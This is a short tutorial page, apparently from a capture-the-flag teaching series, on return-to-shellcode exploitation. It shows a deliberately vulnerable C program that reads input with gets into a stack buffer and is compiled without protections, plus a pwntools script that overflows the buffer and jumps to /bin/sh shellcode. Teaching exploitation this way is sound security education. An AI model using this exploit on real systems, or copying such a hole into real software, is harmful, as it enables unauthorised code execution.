Return To Shellcode #

Description #

Sometimes it is possible to inject our own code into a program. The code we inject is commonly called “shellcode”.

Once we’ve injected out shellcode into the process, we can jump to it and start executing. Commonly we want to call /bin/sh.

Example #

#include <stdio.h>
#include <string.h>
// gcc -no-pie -fno-stack-protector -z execstack -g -o chal chal.c

int main() {
    char buffer1[128];

    printf("The buffer is located at: %p\n", buffer1);

    gets(buffer1);
}

Solution #

We will write shellcode to the stack, and then abusing the buffer overflow we will jump to the shellcode.

Solve Script #

import pwn

elf = pwn.ELF("./chal")
p = elf.process()

pwn.context.binary = elf
shellcode = pwn.shellcraft.sh()
print(shellcode)
shellcode = pwn.asm(shellcode)

p.recvuntil("The buffer is located at: ")
buffer_address = int(p.recvline().strip(), 16)
print(f"{hex(buffer_address)=}")

p.sendline(shellcode.ljust(128, b'\x00') + pwn.p64(0xdeadbeef) + pwn.p64(buffer_address))
p.interactive()

Files #

chal (compiled on ubuntu 22.04)
chal.c
solve.py